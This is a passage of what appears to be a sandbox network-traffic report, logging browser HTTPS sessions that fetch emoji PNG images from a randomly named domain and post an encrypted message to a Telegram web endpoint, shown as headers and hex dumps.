                                  Data Ascii: PNGIHDRPLTEGpLNIo5ke9qk6:j_Lxn44mc7OJpKJ6kf5{<Pziygb7mh47emlg81JKno%pje`
                                  2025-01-12 00:04:02 UTC1369INData Raw: 19 18 ea 1a 1b 5a 54 5f ef 16 16 ea 14 14 fe 0a 09 e7 0e 0e f5 08 08 c6 19 1e e0 0b 0c 52 49 3f eb 00 00 db 04 04 e3 00 00 d4 02 02 45 3c 43 c0 01 02 70 17 4a 3a 30 50 32 26 77 a9 00 00 31 26 76 31 25 75 30 25 74 36 2d 33 2f 23 74 26 26 7b 2e 22 73 97 00 00 2c 20 71 2c 20 6f 91 00 00 2a 1e 6f 28 1c 6d 26 1b 6b 22 1a 55 63 00 12 15 15 72 1e 15 54 1e 16 4d 1d 11 63 1c 14 4d 1c 15 45 1a 0e 5e 1a 13 3f 18 0f 4a 16 09 64 15 0a 59 16 0f 3c 13 06 71 13 08 57 11 06 55 11 08 49 12 0a 3c 10 04 53 0e 03 52 0e 03 51 0e 07 34 0d 01 50 0a 00 5b 0c 01 4a 0c 00 4e 07 01 45 09 01 3f 02 00 56 03 00 4f 08 00 39 08 00 35 07 02 2d 59 52 86 41 3a 6d cc 5a 59 1a 0e 5b 48 3f 7f 3f 35 76 3b 33 6b 60 5b 82 20 16 5c db e4 e6 2e 23 6e 43 3a 7a 35 2a 72 51 49 7f 2b 21 68 57 51 7c 26
                                  Data Ascii: ZT_RI?E<CpJ:0P2&w1&v1%u0%t6-3/#t&&{."s, q, o*o(m&k"UcrTMcME^?JdY<qWUI<SRQ4P[JNE?VO95-YRA:mZY[H??5v;3k`[ \.#nC:z5*rQI+!hWQ|&
                                  2025-01-12 00:04:02 UTC1369INData Raw: c9 4f d0 91 05 0e 15 04 de 99 bc 2e 17 30 a5 06 83 41 3f cb 44 44 22 82 50 f8 1e 3c 9d c9 c6 1f 60 96 74 6a 95 1a a2 55 77 aa 34 b2 45 3f c4 eb 9c 16 91 4a ec 58 2b 75 8e aa e5 a0 7a 67 ac fd 1b 7c bd 28 9b 81 e1 37 05 4e 8c de f9 43 c1 63 56 0c 90 15 c6 93 4c 26 16 44 e5 e1 cc 53 bf 1f be 67 d3 78 f5 45 9d 56 a7 45 e9 52 6b 64 4e af d7 3b 67 2b 17 40 bd 35 54 17 d5 51 cd d6 3b 67 05 10 a4 df 64 36 f7 f5 f4 6e 02 9a de 16 48 4f d0 65 3c fe 2c 00 bb 5d 1e 26 19 89 08 79 52 df b8 05 ce d3 43 cb 0c bf fa fb ce 5c ce 6b 01 78 6d c0 69 56 40 bd 82 d3 e0 3b 5b 05 f5 0a 42 d6 b5 1e 64 b3 5a a3 97 a7 ca 63 fd ff 3f f0 36 3d 1a 5a e0 1e d7 01 51 2d e2 27 22 09 82 23 ac 77 8f 67 a2 51 bb 1f 80 e7 73 c0 6f 11 70 2e 5b 6f d5 59 aa 83 82 ed 42 92 22 9f 33 0a 36 b3 3f
                                  Data Ascii: O.0A?DD"P<`tjUw4E?JX+uzg|(7NCcVL&DSgxEVERkdN;g+@5TQ;gd6nHOe<,]&yRC\kxmiV@;[BdZc?6=ZQ-'"#wgQsop.[oYB"36?
                                  2025-01-12 00:04:02 UTC1369INData Raw: df 91 c1 c1 fe d1 d1 b4 6d 1f 6f 2b 68 68 5d 58 7e 01 77 d9 85 d9 69 de 96 69 f0 62 1a 88 4b 34 70 c0 1c 41 14 71 c6 10 45 71 7a 15 aa 30 a2 78 27 27 f0 27 df 36 94 84 ca 9e 75 8c 65 1a 14 1c b1 00 38 38 0a e9 77 ad 9f 69 3b 44 87 35 2c 2c 7b 1e c3 ba ea 4b 9f ec cb c0 f3 69 20 ae 31 43 85 26 0d 65 74 70 6c 84 89 31 f1 fc 80 b0 0f 5e fb 6b eb 61 99 a8 28 9c 5a e9 1a 3b 9b 99 83 00 4c 67 28 0d 04 e1 f1 63 b5 95 a5 85 7b 45 60 83 35 a6 12 3e 3c 0f 37 7f 33 e7 5f e2 8b cb 0e 2c d7 49 c5 52 4c 53 a1 a8 30 5b 4c 26 96 a2 ea 1c f6 ba 3a bd 2a 86 80 ca 96 c0 7c 2e 20 7c d5 7d f9 c5 df 5a 0d 8b 12 91 48 51 b6 0a cc ae 5e f7 f0 d8 c6 98 46 c7 9c 06 66 96 05 69 6d 9b 13 6d 7f 6d b5 e8 8c 0b 9a ef cd f9 7d 9e ac c0 17 4f ca 75 78 11 26 32 55 48 2a ec 66 35 41 aa c9
                                  Data Ascii: mo+hh]X~wiibK4pAqEqz0x'''6ue88wi;D5,,{Ki 1C&etpl1^ka(Z;Lg(c{E`5><73_,IRLS0[L&:*|. |}ZHQ^Ffimmm}Oux&2UH*f5A
                                  2025-01-12 00:04:02 UTC1203INData Raw: 1c c7 6d 09 29 12 64 0f 1e 72 2a 45 48 0f 1e bc 78 df bb 82 94 ec 96 55 4a 6b 2a 85 22 3d ed 41 90 78 e9 9e 16 d4 2a 22 96 ee c1 6d a5 46 91 2d 26 a5 69 1a f3 6b e2 24 9d 9a 9f 4d 3d e4 b2 c8 22 29 62 02 25 64 2f 25 b0 ec c6 fd 3c cf 33 ce 64 da 3c c9 64 1c 65 de 7f c1 ab cf f4 99 84 3c df 87 0b 54 d3 02 03 b1 1b df 8f 8f 4f 78 48 d3 d3 d7 95 3c 33 cf 8a 6f 74 00 0b a5 c3 8f d7 7e ba f5 77 39 9f cf e1 94 ca 7c e0 4b 61 65 6a 7c 72 82 d4 6e 9c bd 3c bf bb ab 07 b8 57 2a ed e5 c9 b7 41 fc 52 c7 05 c2 77 fb 2e 3e 26 2e fd 58 ec 1b e8 f7 0b 0b 17 a9 90 01 11 f1 5d 9d c3 7f a0 3e 60 21 8f c5 93 b6 d3 9d 81 e7 7e 78 78 97 74 ef fe e2 e2 9d 9f 7f 0d 19 00 6e 08 5e 08 55 e0 f5 69 f8 a6 f0 80 75 03 f1 85 95 07 f4 5d f8 e7 f7 c5 b3 cb cb cb 87 b5 c0 c6 46 26 f6 c2
                                  Data Ascii: m)dr*EHxUJk*"=Ax*"mF-&ik$M=")b%d/%<3d<de<TOxH<3ot~w9|Kaej|rn<W*ARw.>&.X]>`!~xxtn^Uiu]F&


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  110192.168.2.650044172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC379OUTGET /img-apple-160/1f3f4-200d-2620-fe0f.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC899INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 4635
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-121b"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTbb%2BYSUjrt6noLE6Eovwb%2FzrCu83MzG54AEJW2OXvEbFcQynzM2VNnlkio90qudUd3V81IHdu9S41Iv%2FPx0xms3XUvfQtLjPQ%2B9GzSrdQJip02YMwVL0s0u8OwqUKvMFbUhMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30a9be0c420-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1876&min_rtt=1530&rtt_var=821&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=957&delivery_rate=1908496&cwnd=225&unsent_bytes=0&cid=ddccb7e90d04cb5b&ts=144&x=0"
                                  2025-01-12 00:04:02 UTC470INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 02 fd 50 4c 54 45 47 70 4c 16 16 16 ae ae ae 34 35 35 a9 a9 a9 17 16 15 4b 3f 34 a8 a8 a8 df de de 14 14 14 b0 b0 b0 10 10 10 a7 a7 a7 10 10 10 11 11 11 aa aa aa 75 75 75 11 11 11 ab ab ab 11 11 11 ad ad ad 59 56 54 14 14 14 ad ae ae 98 99 9a 12 12 12 7b 78 76 ab ab ab 12 12 12 0f 0f 0f a3 a3 a3 66 60 59 ae ae ae 11 11 11 ac ac ac 8e 8d 8d 0c 0c 0c ab ab ab 57 51 49 16 16 16 83 83 82 58 58 58 12 11 11 aa aa aa 8f 8f 8f 10 10 10 ae ae ae a9 a9 a9 a6 c0 d4 24 24 24 16 16 16 ab ab ab ad ad ad 69 79 85 14 14 14 f7 fe ff 39 39 39 ab ab ab 12 12 12 a3 a3 a3 ab ab ab 11 11 11 90 90 8f 51 51 51 0d 0d 0d ad ad ad 18 18 18 8c 8b 8b aa aa aa 10 10 10 4e 5e 6f 89
                                  Data Ascii: PNGIHDRPLTEGpL455K?4uuuYVT{xvf`YWQIXXX$$$iy999QQQN^o
                                  2025-01-12 00:04:02 UTC1369INData Raw: b6 b6 b6 b3 b3 b3 9a b7 d1 af af af ab ac ac a6 a6 a6 a3 a3 a3 a0 a0 a0 9e 9e 9e 8b a1 b2 9b 9b 9b 98 98 98 97 97 97 96 96 96 82 9a af 94 94 94 92 92 92 8f 8f 8f 8e 8e 8e 8b 8c 8c 8a 8a 8a 88 88 88 71 8b a8 86 86 86 83 83 84 81 81 81 80 80 80 7d 7d 7d 7b 7b 7b 78 78 78 69 79 85 75 75 75 72 72 73 70 70 70 6e 6e 6e 61 6e 7a 6b 6b 6b 53 70 8f 68 68 68 66 66 66 63 63 63 60 60 60 5d 5d 5d 4a 5e 70 5a 5a 5a 61 53 55 60 54 48 56 56 56 41 58 70 53 53 53 50 50 50 3b 53 6b 4d 4d 4d 4b 4b 4b 49 49 49 3f 4b 54 47 47 47 53 3f 40 45 45 45 2f 49 63 31 46 5a 42 42 42 40 40 40 3f 3f 3f 3e 3e 3e 3d 3d 3d 3c 3c 3c 3b 3b 3b 3a 3a 3a 39 39 39 38 38 38 37 37 37 36 36 36 35 35 35 34 34 34 33 33 33 32 32 32 31 31 31 30 30 30 2f 2f 2f 2e 2e 2e 2d 2d 2d 2c 2c 2c 2b 2b 2b 2a 2a 2a
                                  Data Ascii: q}}}{{{xxxiyuuurrspppnnnanzkkkSphhhfffccc```]]]J^pZZZaSU`THVVVAXpSSSPPP;SkMMMKKKIII?KTGGGS?@EEE/Ic1FZBBB@@@???>>>===<<<;;;:::999888777666555444333222111000///...---,,,+++***
                                  2025-01-12 00:04:02 UTC1369INData Raw: bd 04 03 0d 55 63 29 65 c5 d3 71 1c 37 43 c9 70 00 28 00 21 9c be 40 20 f6 dd b8 b6 5b 00 a7 46 3f 19 05 ec c1 c1 22 61 f9 54 0b 32 d8 cd 09 6e 70 fe bd da c0 b3 9a 7d ac a5 16 12 cd 9d 1e d5 54 2b 5b e8 80 ed fc c9 82 61 b5 dc cd b5 54 98 7d 0f df 71 f6 28 d8 a9 eb 16 a2 9f bd 2d 48 2a e6 8d 84 d2 1d 2f 61 f9 08 d4 aa 0e 23 88 30 38 46 70 2c a5 64 17 78 ca 84 10 76 41 35 d1 89 6f a1 30 44 e4 fa f1 0f 8e de 8c 33 3c 38 1c 97 27 58 0d 07 cc 46 16 ec 84 3a e1 41 6d 22 f7 1f c2 45 88 c9 f1 1b 9f 4d 47 e7 fc e2 60 a4 a5 0b 2e b7 cb 08 a1 5a 7d c6 4d e1 66 2f 45 2c 19 bb 73 5d 07 50 e5 08 6e a0 60 08 6b e9 78 2c a5 2e e2 a7 58 45 88 70 0e 93 d3 35 ae 05 09 80 1b 2f c8 31 79 e6 dd a3 67 45 74 61 43 32 cb 70 f1 27 03 28 35 03 e7 59 43 e6 06 09 72 2c f7 de 89 0b
                                  Data Ascii: Uc)eq7Cp(!@ [F?"aT2np}T+[aT}q(-H*/a#08Fp,dxvA5o0D3<8'XF:Am"EMG`.Z}Mf/E,s]Pn`kx,.XEp5/1ygEtaC2p'(5YCr,
                                  2025-01-12 00:04:02 UTC1369INData Raw: 5f e4 4d 96 85 68 ba 3f 5e 5c fd 12 53 f4 9b cc a1 91 9d 9b ab 57 cd 5d 43 eb 00 22 02 e1 d2 b1 93 27 4f 9c f8 f0 e8 f5 24 ad b6 20 a7 be 3d 73 fa a6 91 1a d8 bb 03 4c f0 f0 b5 90 de 74 68 c0 b7 26 94 4b b6 2c 8d 5f 39 79 2e b9 3a 1f bf 85 b0 5e f8 7c 1c 39 80 9e 38 30 75 3f a8 33 83 01 6d d3 fa 07 bd 87 4e dd f6 ac 09 0a 81 48 8c 7f d1 36 58 5a d5 04 d5 d8 e9 5b 42 d3 54 64 06 fa 3a e6 fc b9 62 fd c6 a7 9f 12 76 b6 fb f9 0d 60 cc 12 1f bb aa 10 ea 40 2b 21 98 fe ea 32 54 90 2d 76 6c 31 bc ab 90 53 3d dd c3 7b f6 6c 19 16 f7 8b 2a e5 32 87 07 3d 43 72 11 24 30 5d 56 ea fa 35 5c 90 a9 f3 e6 d9 6c 8c 88 b1 75 6f 21 3f 74 70 cb d6 fd 5b 1e 7f e2 e9 78 db e0 85 5b 0f 85 ce a0 6c c7 c1 f5 ae 5d 28 b1 f8 45 03 6a 90 20 2b a9 f4 ed 4f ee 47 01 58 7d fb 14 8b 69
                                  Data Ascii: _Mh?^\SW]C"'O$ =sLth&K,_9y.:^|980u?3mNH6XZ[BTd:bv`@+!2T-vl1S={l*2=Cr$0]V5\luo!?tp[x[l](Ej +OGX}i
                                  2025-01-12 00:04:02 UTC58INData Raw: d8 12 6c 09 b6 04 5b 82 2d c1 66 a1 ce 0e 1a 7e b8 d0 c6 fd 7b 9e da a2 b5 fe c7 5c 8b 16 2d 5a b4 68 b1 ea fc 11 68 ca d8 76 63 6b 55 08 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: l[-f~{\-ZhhvckUIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  111192.168.2.650046172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC608OUTGET /img-apple-160/1f1e6-1f1f9.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC896INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 4129
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1021"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NTkPHS7G8%2BHckftgGNT70iePXNRnerPvpOu11K2k8PYwQCxFByoLfA0mEDDs9Xeixxn7QJ5KyE0qrykuOzrXqk5LM7jugXWU4KM6OoOyDmntiElxkplx71DWihVV%2FXQoF8bV1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30aa8fe7271-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=1842&rtt_var=809&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1585233&cwnd=225&unsent_bytes=0&cid=651fddfc96935ed8&ts=643&x=0"
                                  2025-01-12 00:04:02 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 79 22 1f c1 75 73 76 1e 1c bc 6e 6c 74 1c 19 c3 77 75 74 1e 1b c1 76 74 75 1f 1c b9 6a 67 ab b6 b6 a9 a9 a9 9d 2f 2a c3 7a 78 75 1d 1a b6 62 60 bf 74 71 75 1e 1b 93 94 94 8d 57 54 86 16 13 98 30 2c ba 6f 6d 75 1c 1a c5 79 77 75 1e 1b a6 4d 4a bd 71 6e 75 1e 1b c6 7a 78 75 1d 1a bc 71 6e 74 1e 1b c6 7a 78 7a 22 20 6e 17 14 c4 78 76 b8 6c 6a a6 47 44 ff ff ff fe ff ff fd fe fe fa ff ff fc fc fc f4 ff ff fb fb fb fa fa fa f9 f9 f9 f9 f8 f8 f7 f8 f8 f7 f6 f6 ea fa fb f5 f5 f5 f4 f3 f3 ea f7 f7 f3 f2 f2 f1 f1 f2 fc eb eb f0 f0 f0 ef f0 f0 e0 f5 f6 ee ee ee ec ec ec dd f1 f1 ea ea ea f6 e5 e4 fc e0 df e8 e8 e8 dc ed ed e3 ea ea e7
                                  Data Ascii: PNGIHDRPLTEGpLy"usvnltwutvtujg/*zxub`tquWT0,omuywuMJqnuzxuqntzxz" nxvljGD
                                  2025-01-12 00:04:02 UTC1369INData Raw: d5 52 4d ec 48 43 ee 47 42 ec 47 42 c1 59 56 e7 49 44 ea 47 42 ec 46 41 eb 45 40 ee 43 3d b4 5b 59 e8 45 40 ea 44 3f c9 51 4d e9 43 3e e2 45 40 b7 57 54 e6 43 3e d7 48 43 e6 41 3c ed 3e 39 e6 3f 3a e3 3f 3a b8 51 4d cd 47 43 dc 40 3c e2 3d 38 c0 4b 48 ed 38 32 e1 3c 37 de 3b 36 e0 3a 35 d4 3e 3a e4 37 31 dd 39 34 ec 32 2d cb 3f 3b dd 37 32 c2 42 3e da 37 32 db 35 30 d2 38 33 ec 2d 27 d8 34 2f c9 3a 36 e3 2f 2a d7 32 2d d1 33 2e c1 39 35 cc 34 2f d5 30 2b e5 29 23 d1 30 2b c9 33 2f d4 2e 29 da 2a 25 d2 2d 28 c0 34 2f b6 37 34 ce 2d 28 d1 2b 26 d0 2a 25 c7 2d 29 cd 2a 25 b8 32 2e dd 22 1d ce 28 23 cb 29 24 ad 35 31 cc 27 22 c2 2a 25 c9 27 22 b9 2d 28 c7 26 21 af 30 2c ca 24 1f a1 34 31 c6 24 20 c7 23 1e c3 24 1f d5 1c 16 c6 22 1d c4 22 1d bf 23 1e b5 26 22
                                  Data Ascii: RMHCGBGBYVIDGBFAE@C=[YE@D?QMC>E@WTC>HCA<>9?:?:QMGC@<=8KH82<7;6:5>:71942-?;72B>725083-'4/:6/*2-3.954/0+)#0+3/.)*%-(4/74-(+&*%-)*%2."(#)$51'"*%'"-(&!0,$41$ #$""#&"
                                  2025-01-12 00:04:02 UTC1369INData Raw: 5a a0 41 49 ad c2 0a 58 db 1b 02 81 1a 6f 13 ae a2 21 09 12 a5 c1 02 10 1c b6 0b 6c 61 7d a0 54 52 2e 75 32 e4 97 80 64 0a ce 81 d6 de 1c 88 07 6b b1 50 25 a0 03 ab 6d 74 60 5b a0 07 a0 8e b6 f5 3e 87 d1 21 5b 07 c4 28 32 14 4a dc 16 e8 6d f4 11 81 50 45 b1 23 ca 9a c8 23 fa 48 c0 1a d6 03 1d 00 9b 81 88 db 01 3d e9 8e 4d 3e 56 40 cb 65 a0 e3 22 b0 e9 d3 2e 01 39 13 2e 6f 8a a5 30 01 51 17 80 b6 5e 01 a7 f2 06 40 0b 2d d0 db 4b c0 e4 4b c0 78 86 47 5b d3 b5 b5 40 0c a9 84 2d 90 2c 02 c9 14 0a 44 0b 94 a3 9b 00 3d e7 15 74 76 05 74 01 1a 7a 40 20 01 3b b4 00 29 d9 7a 20 a2 05 22 e2 12 df 12 68 49 40 3c 1b 80 96 e0 f0 ae 67 eb 03 25 59 07 88 8a c0 1b 57 70 e5 6b 81 de 82 c5 45 22 ae 03 6c a2 3e 24 60 6b eb 02 05 5a 9a 8b 40 f4 65 20 22 55 f0 f6 40 47 04 3a
                                  Data Ascii: ZAIXo!la}TR.u2dkP%mt`[>![(2JmPE##H=M>V@e".9.o0Q^@-KKxG[@-,D=tvtz@ ;)z "hI@<g%YWpkE"l>$`kZ@e "U@G:
                                  2025-01-12 00:04:02 UTC918INData Raw: fa 14 c8 91 a0 de dd d9 b9 07 1c 2f 65 f3 7e 9f a4 6b 6b 81 21 bb 66 ea a3 3f 54 b1 19 98 2e a2 2b 32 03 29 47 3b 47 c0 e9 69 53 f4 db 10 74 9a 89 dd 67 36 57 03 a5 be dd 58 4a a7 4f 42 68 fb 24 eb db 10 dd 66 62 7f 95 5b 60 7f b0 47 11 07 7b be 39 30 70 25 90 c0 ba 6e a7 a0 1f 75 c5 e4 91 22 cd 6e b5 40 ca 5b 00 b1 67 c0 f5 ad b0 f5 40 ef ba 32 52 7a c0 d5 f4 5b 26 b9 30 5c 56 63 6f 06 8c 28 fc c6 66 62 02 76 67 16 5a 57 67 b8 ac 3f 9e a7 e9 8c e7 dd 12 d8 69 68 f7 80 a2 3b b3 e0 fa 36 ba e3 79 9d 01 47 c9 fa f1 bc db 37 b4 1d d8 04 24 ac 86 3e 2e 01 a1 01 ae 00 de 70 44 f4 56 40 ac 25 01 d9 30 54 91 6c eb 81 66 fd 0c 6b 46 ce ed 67 58 fb 40 1c 1b 80 97 26 8f fa b6 94 2b c6 94 35 7d 20 f3 cd 40 fc b5 63 29 6b 27 8f 92 ae b9 ec ba 12 a8 0d e7 40 2d 41 45
                                  Data Ascii: /e~kk!f?T.+2)G;GiStg6WXJOBh$fb[`G{90p%nu"n@[g@2Rz[&0\Vco(fbvgZWg?ih;6yG7$>.pDV@%0TlfkFgX@&+5} @c)k'@-AE


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  112192.168.2.650038149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d 8f 58 28 3f 3f 53 27 54 2c 9e 0b 27 e1 cc 67 22 d3 98 ef 94 85 2e af a8 32 b0 0d f5 d6 f9 8d 98 ce 68 44 8c db 73 2c 3c ce 4a da 60 3e 2a 55 cf 3e fc 8b c3 2d 1c b7 a3 fe a4 b0 0c a0 5d ef 9b 20 cb 62 41 29 ea e1 71 3d 0b 5c b2 82 70 9a ff
                                  Data Ascii: *x%MX(??S'T,'g".2hDs,<J`>*U>-] bA)q=\p
                                  2025-01-12 00:04:02 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 88
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:02 UTC88INData Raw: 2a 10 06 78 25 cb 00 4d 81 95 00 ac 91 5a fc 5f 10 0d fd ef 34 f5 b6 53 33 84 e8 86 10 2c e2 58 b2 a4 c4 bc a8 6a 1c 6e 89 89 ab e1 0d 0e 67 bf d0 b2 98 a7 05 c2 51 4e d3 50 b1 5e 40 00 2e 43 ae 92 c6 cb 7b 89 af 47 4c 94 30 47 02 1c 4b 72 94 60 92 52 08 5b 8c 27
                                  Data Ascii: *x%MZ_4S3,XjngQNP^@.C{GL0GKr`R['


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  113192.168.2.650050172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC370OUTGET /img-apple-160/1f1e6-1f1f7.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC895INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 5126
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1406"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPoZBCYU7JlPCR0pKRhR1OkgJM%2FRPvxH6MQH7dIEhoIMP1ndzh8aIMNjsGeT0ODpxtC6NMkNgSl2LHFUwDTKEKyMdlE4wetnYsFMqkIc28DTskkAgsL7K3rv8ECCAdXU01%2Fb5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30be95843f8-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1609&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1787025&cwnd=217&unsent_bytes=0&cid=a7b0d127796c3ac7&ts=160&x=0"
                                  2025-01-12 00:04:02 UTC474INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 42 61 7b 43 61 7c 45 64 81 4e 71 91 55 7b 9e 5b 83 a9 60 89 af 60 8b b3 61 8c b4 62 8d b5 62 8e b7 63 8f b8 64 90 b9 65 91 ba 66 92 bb 67 93 bb 68 94 bd 69 95 be 6a 96 bf 6b 97 c0 6c 98 c1 6d 99 c2 6e 9a c3 6f 9b c4 70 9c c5 70 9d c7 72 9e c7 72 9f c9 74 a0 c9 75 a1 cb 76 a2 cb 77 a3 cc 79 a4 cd 79 a5 cf 7a a6 cf 7b a7 d1 7c a8 d1 7d a9 d2 7e aa d3 7f ab d4 7f ac d5 80 ad d6 82 ae d7 83 af d8 83 b0 d9 84 b1 db 86 b1 d9 86 b2 db 87 b3 db 87 b3 dc 88 b4 dd 88 b5 de 89 b6 de 89 b6 df 7b ad db 77 aa d9 be d6 ec ac ca e6 95 bc e0 a1 c3 e2 ff ff fb f7 f7 f8 e6 ef f7 cf e1 f0 dc e7 f1 ee f4 f9 dc eb f8 e9 f1 f8 d5 e3 f0 c7 da eb b9
                                  Data Ascii: PNGIHDRPLTEGpLBa{Ca|EdNqU{[``abbcdefghijklmnopprrtuvwyyz{|}~{w
